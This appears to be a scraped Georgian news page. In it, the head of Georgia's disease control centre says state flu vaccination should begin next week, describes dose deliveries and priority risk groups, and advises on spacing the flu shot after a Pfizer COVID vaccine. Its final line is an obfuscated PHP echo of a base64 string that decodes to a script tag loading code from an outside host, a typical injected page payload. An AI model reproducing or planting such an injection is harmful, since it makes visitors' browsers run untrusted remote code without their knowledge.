celsiusi
ავერსი საქკაბელი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის ამირან გამყრელიძის განცხადებით, გრიპის საწინააღმდეგო ვაქცინაცია შესაძლოა მომდევნო კვირიდან დაიწყოს. ამის შესახებ მან ჟურნალისტებს განუცხადა.
 
მისი თქმით, გრიპის აცრების გაკეთებას ტრადიციულად საჯარო და კერძო სექტორები წარმართავენ.
 
„მიმდინარე წელს სახელმწიფომ 200 000 დოზა გრიპის ვაქცინა იყიდა, აქედან 43 000 წინა კვირას შემოვიდა. ამ ვაქცინებით პირველ რიგში სამი დიდი რისკ ჯგუფი აიცრება - სამედიცინო პერსონალი, დიალიზზე მყოფი პირები და ორსულები. შემდეგ ოქტომბერში დანარჩენი 150 000 დოზა სავარაუდოდ ორ პარტიად შემოვა და დანარჩენი რისკჯგუფები აიცრებიან.
 
კერძო სექტორს გრიპის ვაქცინის რამდენიმე ათეული ათასი დოზა ყოველწლიურად შემოაქვს. სასიამოვნოა, რომ ქვეყანაში გრიპის აცრის კულტურა იზრდება. ვფიქრობ, მომავალი კვირიდან დავიწყებთ გრიპის ვაქცინაციას“, - განაცხადა გამყრელიძემ.
 
კითხვაზე - რა პერიოდში შეიძლება გრიპის ვაქცინის გაკეთება, „ფაიზერით“ სრულად ვაქცინაციის შემდეგ, NCDC-ის ხელმძღვანელმა უპასუხა: „გრიპის და კოვიდის ვაქცინის გაკეთება ერთ დღეს შეიძლება გაიკეთოთ - ერთ მკლავზე ერთი, მეორეზე - მეორე. მაგრამ თუ „ფაიზერი“ უკვე გაკეთებული გაქვთ, გრიპის ვაქცინის გაკეთება 1-2 კვირის შემდეგ შეგიძლიათ“.
1000
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");